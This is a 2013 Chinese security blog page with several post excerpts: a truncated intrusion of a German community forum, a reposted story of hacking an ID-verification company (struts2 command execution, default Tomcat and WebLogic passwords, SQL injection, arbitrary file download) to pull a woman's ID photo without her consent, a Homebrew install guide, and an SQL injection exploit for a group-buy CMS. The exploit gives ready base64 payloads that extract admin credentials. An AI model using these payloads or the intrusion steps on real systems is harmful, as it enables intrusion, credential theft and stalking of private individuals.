渗透德国某华人社区

作者:Secer 发布时间:August 23, 2013 分类:渗透测试

作者:Webrobot

目标站:forum.AAAA.de

1.查看服务器信息

clip_image002

2.御剑查询旁站

clip_image004

3.轩辕剑看CMS,

clip_image005

阅读剩余部分...

查找心中女神照片的坎坷之路

作者:Secer 发布时间:August 23, 2013 分类:Web安全

简要描述:
女神不肯给我照片,迫不得已,我只能自己想办法了
struts2命令执行+Tomcat弱口令+SQL注入+任意文件下载
详细说明:
google搜索了一下分站,没找到什么漏洞,从C段入手,查看idtag.cn的mx服务器是mail.idtag.cn,ip 211.151.123.250,扫描了一下这个段,找到了http://211.151.123.232/desktop/parse.action
clip_image001
struts2执行漏洞,这个站是原来的dt.id5.cn,新的网站架构换了,没这个漏洞。拿下shell后,研究网站,这网站是可以用身份证号码+姓名查照片的,不过是老的,所以接口没用了。
扫描内网,找到了一个Tomcat,http://192.168.1.151:8080/
clip_image003
admin,admin进去了,拿下shell后发现,此服务器是gboss.id5.cn国政通综合业务平台的测试服务器,登录测试系统后,发现里面有身份证查询接口的配置,不过这是测试的系统,很多东西都不对,要拿到gboss才行。用测试系统的帐号去登录gboss,都进不去。研究源码后发现,他有些页面不用登录也可以访问,http://gboss.id5.cn/empQuery.do?operate=list,这里可以看到用户列表,查询用户这个有注入
clip_image005
读admin密码,32位的MD5一位一位的猜,十分钟过后,终于读出来了,倒霉,不能破解,换个管理员,又是半天,还是无法破解。没办法,查看首页登录的代码,发现它首先把密码MD5了一下,再去验证的,刚好不用破解,另存为本地文件,我直接本地提交HASH,登录成功。
接着想办法拿shell,找遍了所有功能,上传绕不过去,不过发现了他有下载客户上传的文件的功能,看下URL,http://gboss.id5.cn/business/webBatchUpload.do?operate=download&type=1&thrId=120944358&callType=2&url=filepath,试下下载/etc/passwd,成功。扫描到他开放了7001端口,访问http://gboss.id5.cn:7001/console/,weblogic的后台,试了下默认密码,进不去,用之前的文件下载漏洞,下载到weblogic的配置文件,本地搭环境,把密码解密了出来,进weblogic后台,部署war,成功拿下shell。然后反编译网站的class,找到了接口的调用方法,和接口的授权文件。在网上找了个身份证号来测试,成功看到照片。照片用base64解密下就行了
clip_image007
剩下的就是看女神的了,但是不知道女神的身份证号啊,身份证前六位是地区,这个可以确定,然后后面8位是出生日期,这个也可以确定,最后一位是校验码,根据前面17个数得来,那么只有三位数不知道了,身份证倒数第二位偶数是女性,这样,这样就只有500个号了,用PHP写好,提交,很不幸,没有找到,后来我才知道,这是2008年的老数据,当时女神还没身份证呢,哎,过程这么坎坷,最终还是没有看到。

乌云看到的,哈哈 比较搞笑就发来。

让Mac也能拥有apt-get类似的功能——Brew

作者:Secer 发布时间:August 13, 2013 分类:Linux笔记

之前一直怀念ubuntu下的apt-get,因为实在是方便,需要安装什么,一个命令搞定,相关的依赖包统统由apt-get维护。下载,编译,安装,那叫一个痛快。什么软件用着不爽,一个命令卸载!

brew主页brew进行了详细的描述,不过我们更希望下载下来实战演练!

安装brew

  1. 使用brew安装软件
  2. 使用brew卸载软件
  3. 使用brew检索软件

1.安装brew:

curl -LsSf http://github.com/mxcl/homebrew/tarball/master | sudo tar xvz -C/usr/local --strip 1

 

上述命令,在官网上可以找到!

image 

2.使用brew安装软件
别的工具不说,wget少不了,但是mac上默认没有!clip_image002
就先拿它来开刀了:

brew install wget

或者是unrar:

brew install unrar

 

image
3.使用brew卸载软件
安装简单,卸载就更简单了:

brew uninstall unrar  

4.使用brew检索软件
看看我们能搜到什么:

brew search /apache*/


/apache*/使用的是正则表达式,注意使用/分隔!
至此,brew已经能解决我的大部分软件安装问题了!

http://snowolf.iteye.com/blog/774312

易想团购subscribe.php页面sql注入(附exp)

作者:Secer 发布时间:August 9, 2013 分类:Web安全

易想团购subscribe.php这个页面存在问题

其中除了$_REQUEST['act']=='mail'选项未添加页面发送信息外,其余选项都拼接了用户发送信息。

属于post表单信息。

elseif($_REQUEST['act']=='unsubscribe')
{
        $email_code = trim($_REQUEST['code']);  //只去掉了两端预定义字符
        $email = base64_decode($email_code);   //简单的base64_decode编码 之后就带入了语句
        if($GLOBALS['db']->getOne("select count(*) from ".DB_PREFIX."mail_list where mail_address='".$email."'")==0)
        {
showErr($GLOBALS['lang']['MAIL_NOT_EXIST'],0,APP_ROOT);
        }
        else
        {
send_unsubscribe_mail($email);
showSuccess($GLOBALS['lang']['MAIL_UNSUBSCRIBE_VERIFY'],0,APP_ROOT);
        }
}
elseif($_REQUEST['act']=='dounsubscribe')
{
        $email_code = trim($_REQUEST['code']); //和以上一样的错误
        $email_code =  base64_decode($email_code);
        $arr = explode("|",$email_code);
        $GLOBALS['db']->query("delete from ".DB_PREFIX."mail_list where code = '".$arr[0]."' and mail_address = '".$arr[1]."'");
        $rs = $GLOBALS['db']->affected_rows();
        if($rs)
        {
showSuccess($GLOBALS['lang']['MAIL_UNSUBSCRIBE_SUCCESS'],0,APP_ROOT);
        }
        else
        {
showErr($GLOBALS['lang']['MAIL_UNSUBSCRIBE_FAILED'],0,APP_ROOT);
        }
}

可以看到用户输入很简单的带入了sql语句中,不过最终结果并未直接显示在页面上。还是靠页面返回信息来判断语句执行是否成功

exp构造:

https://ha.cker.in/subscribe.php?act=unsubscribe&code=secer') and (updatexml(1,concat(0x3a,(select concat(adm_name,0x3a,adm_password) from easethink_admin limit 1)),1))#

红色的参数code注入部分base64后:

https://ha.cker.in/subscribe.php?act=unsubscribe&code=c2VjZXInKSBhbmQgKHVwZGF0ZXhtbCgxLGNvbmNhdCgweDNhLChzZWxlY3QgY29uY2F0KGFkbV9uYW1lLDB4M2EsYWRtX3Bhc3N3b3JkKSBmcm9tIGVhc2V0aGlua19hZG1pbiBsaW1pdCAxKSksMSkpIw==

如果不是默认表前缀会报错,修改表前缀后base64编码了再提交。

image

修改表前缀

https://ha.cker.in/subscribe.php?act=unsubscribe&code=secer' and (updatexml(1,concat(0x3a,(select concat(adm_name,0x3a,adm_password) from esjj_admin limit 1)),1))#

重新提交

https://ha.cker.in/subscribe.php?act=unsubscribe&code=c2VjZXInIGFuZCAodXBkYXRleG1sKDEsY29uY2F0KDB4M2EsKHNlbGVjdCBjb25jYXQoYWRtX25hbWUsMHgzYSxhZG1fcGFzc3dvcmQpIGZyb20gZXNqal9hZG1pbiBsaW1pdCAxKSksMSkpIw==

image